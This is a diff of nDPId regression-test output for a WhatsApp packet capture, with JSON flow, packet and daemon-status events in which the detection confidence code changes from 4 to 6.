00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":640,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":82,"flow_packet_id":1,"flow_last_seen":1655111980926,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655111980926,"pkt":"eJS0JASgYDjgxTWgCABFAAA8nTtAAD8GZRbAqAJkszzDIbXwFGY7fhdqAAAAAKAC\/\/9FJAAAAgQFtAQCCAoGjKWkAAAAAAEDAwk="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":641,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":82,"flow_packet_id":2,"flow_last_seen":1655111980926,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655111980926,"pkt":"eJS0JASgYDjgxTWgCABFAAA0nTxAAD8GZR3AqAJkszzDIbXwFGY7fhdrAsizuoAQAKw+YAAAAQEICgaMpcT4l4Wb"} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":642,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":82,"flow_packet_id":3,"flow_last_seen":1655111980926,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655111980926,"pkt":"eJS0JASgYDjgxTWgCABFAAA4nT1AAD8GZRjAqAJkszzDIbXwFGY7fhdrAsizuoAYAKz5CQAAAQEICgaMpcn4l4WbRUQAAQ=="} 
-00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":643,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655111980926,"flow_last_seen":1655111980926,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":7,"flow_tot_l4_payload_len":11,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1655111980926,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":46576,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":643,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655111980926,"flow_last_seen":1655111980926,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":7,"flow_tot_l4_payload_len":11,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1655111980926,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":46576,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00564{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":648,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":648,"packets-processed":647,"total-skipped-flows":0,"total-l4-payload-len":48127,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":82,"total-detection-updates":0,"total-updates":0,"current-active-flows":14,"total-active-flows":82,"total-idle-flows":68,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":537,"global_ts_msec":1655113084330} 
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":648,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655113084330,"flow_last_seen":1655113084330,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655113084330,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":38234,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":648,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":83,"flow_packet_id":1,"flow_last_seen":1655113084330,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655113084330,"pkt":"eJS0JASgYDjgxTWgCABFAAA81OlAAD8GLVjAqAJkszzDMZVaFGZIDGKXAAAAAKAC\/\/9f+wAAAgQFtAQCCAo4tSFvAAAAAAEDAwk="} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":649,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":83,"flow_packet_id":2,"flow_last_seen":1655113084383,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655113084383,"pkt":"eJS0JASgYDjgxTWgCABFAAA01OpAAD8GLV\/AqAJkszzDMZVaFGZIDGKYqtuzMYAQAID\/YQAAAQEICji1IaRj8syi"} 
00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":650,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":83,"flow_packet_id":3,"flow_last_seen":1655113084570,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655113084570,"pkt":"eJS0JASgYDjgxTWgCABFAAA41OtAAD8GLVrAqAJkszzDMZVaFGZIDGKYqtuzMYAYAIC5cwAAAQEICji1IkFj8syiRUQAAQ=="} -00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":651,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655113084330,"flow_last_seen":1655113084612,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":11,"flow_tot_l4_payload_len":15,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1655113084612,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":38234,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":656,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655105188559,"flow_last_seen":1655105188835,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":302,"flow_tot_l4_payload_len":588,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1655113084909,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":47590,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 
+00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":651,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655113084330,"flow_last_seen":1655113084612,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":11,"flow_tot_l4_payload_len":15,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1655113084612,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":38234,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":656,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655105188559,"flow_last_seen":1655105188835,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":302,"flow_tot_l4_payload_len":588,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1655113084909,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":47590,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00564{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":656,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":656,"packets-processed":655,"total-skipped-flows":0,"total-l4-payload-len":48424,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":83,"total-detection-updates":0,"total-updates":0,"current-active-flows":14,"total-active-flows":83,"total-idle-flows":69,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":544,"global_ts_msec":1655114622076} 
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":656,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655114622076,"flow_last_seen":1655114622076,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655114622076,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":47284,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":656,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":84,"flow_packet_id":1,"flow_last_seen":1655114622076,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655114622076,"pkt":"eJS0JASgYDjgxTWgCABFAAA8E3JAAD8G7t\/AqAJkszzDIbi0FGYRoZALAAAAAKAC\/\/83+QAAAgQFtAQCCAoGqmEpAAAAAAEDAwk="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":657,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":84,"flow_packet_id":2,"flow_last_seen":1655114622106,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655114622106,"pkt":"eJS0JASgYDjgxTWgCABFAAA0E3NAAD8G7ubAqAJkszzDIbi0FGYRoZAMgQqHroAQAKz9CwAAAQEICgaqYVZ8b+Op"} 
00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":658,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":84,"flow_packet_id":3,"flow_last_seen":1655114622112,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655114622112,"pkt":"eJS0JASgYDjgxTWgCABFAAA4E3RAAD8G7uHAqAJkszzDIbi0FGYRoZAMgQqHroAYAKy3tQAAAQEICgaqYVt8b+OpRUQAAQ=="} -00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":659,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655114622076,"flow_last_seen":1655114622114,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":7,"flow_tot_l4_payload_len":11,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1655114622114,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":47284,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":664,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655105755895,"flow_last_seen":1655105756270,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":334,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1655114622275,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":49428,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 
-00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":664,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655105790019,"flow_last_seen":1655105790289,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":323,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1655114622275,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":47634,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":659,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655114622076,"flow_last_seen":1655114622114,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":7,"flow_tot_l4_payload_len":11,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1655114622114,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":47284,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":664,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655105755895,"flow_last_seen":1655105756270,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":334,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1655114622275,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":49428,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":664,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655105790019,"flow_last_seen":1655105790289,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":323,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1655114622275,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":47634,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00564{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":664,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":664,"packets-processed":663,"total-skipped-flows":0,"total-l4-payload-len":49697,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":84,"total-detection-updates":0,"total-updates":0,"current-active-flows":13,"total-active-flows":84,"total-idle-flows":71,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":552,"global_ts_msec":1655116217773} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":664,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655116217773,"flow_last_seen":1655116217773,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655116217773,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":39334,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":664,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":85,"flow_packet_id":1,"flow_last_seen":1655116217773,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655116217773,"pkt":"eJS0JASgYDjgxTWgCABFAAA8AehAAD8GAFrAqAJkszzDMZmmFGbbOiylAAAAAKAC\/\/9QjQAAAgQFtAQCCApyEZX4AAAAAAEDAwk="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":665,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":85,"flow_packet_id":2,"flow_last_seen":1655116217805,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655116217805,"pkt":"eJS0JASgYDjgxTWgCABFAAA0AelAAD8GAGHAqAJkszzDMZmmFGbbOiymFXtouYAQAIBHtQAAAQEICnIRlijWRuJq"} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":666,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":85,"flow_packet_id":3,"flow_last_seen":1655116217850,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655116217850,"pkt":"eJS0JASgYDjgxTWgCABFAAA4AepAAD8GAFzAqAJkszzDMZmmFGbbOiymFXtouYAYAIACNwAAAQEICnIRllXWRuJqRUQAAQ=="} 
-00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":667,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655116217773,"flow_last_seen":1655116217880,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":282,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1655116217880,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":39334,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":672,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655108001441,"flow_last_seen":1655108001999,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":518,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1655116218131,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":49610,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":672,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655108385462,"flow_last_seen":1655108385787,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1655116218131,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":37378,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":672,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655108453657,"flow_last_seen":1655108453928,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":320,"flow_tot_l4_payload_len":606,"flow_avg_l4_payload_len":75,"midstream":0,"thread_ts_msec":1655116218131,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":47738,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":667,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655116217773,"flow_last_seen":1655116217880,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":282,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1655116217880,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":39334,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 
+00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":672,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655108001441,"flow_last_seen":1655108001999,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":518,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1655116218131,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":49610,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":672,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655108385462,"flow_last_seen":1655108385787,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1655116218131,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":37378,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":672,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655108453657,"flow_last_seen":1655108453928,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":320,"flow_tot_l4_payload_len":606,"flow_avg_l4_payload_len":75,"midstream":0,"thread_ts_msec":1655116218131,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":47738,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00564{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":672,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":672,"packets-processed":671,"total-skipped-flows":0,"total-l4-payload-len":50313,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":85,"total-detection-updates":0,"total-updates":0,"current-active-flows":11,"total-active-flows":85,"total-idle-flows":74,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":561,"global_ts_msec":1655116940904} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":672,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655116940904,"flow_last_seen":1655116940904,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655116940904,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":40006,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":672,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":86,"flow_packet_id":1,"flow_last_seen":1655116940904,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655116940904,"pkt":"eJS0JASgYDjgxTWgCABFAAA890NAAD8GCv7AqAJkszzDMZxGFGZlwIwQAAAAAKAC\/\/9j2AAAAgQFtAQCCApyHJYRAAAAAAEDAwk="} 
00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":673,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":86,"flow_packet_id":2,"flow_last_seen":1655116940935,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655116940935,"pkt":"eJS0JASgYDjgxTWgCABFAAA090RAAD8GCwXAqAJkszzDMZxGFGZlwIwR5J7sZYAQAIAZ6gAAAQEICnIclkN2QDC1"} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":674,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":86,"flow_packet_id":3,"flow_last_seen":1655116940973,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655116940973,"pkt":"eJS0JASgYDjgxTWgCABFAAA490VAAD8GCwDAqAJkszzDMZxGFGZlwIwR5J7sZYAYAIDUcQAAAQEICnIclmp2QDC1RUQAAQ=="} -00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":675,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655116940904,"flow_last_seen":1655116941004,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":282,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1655116941004,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":40006,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 
-00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":679,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655114622076,"flow_last_seen":1655114622275,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1258,"flow_tot_l4_payload_len":1273,"flow_avg_l4_payload_len":159,"midstream":0,"thread_ts_msec":1655116941291,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":47284,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 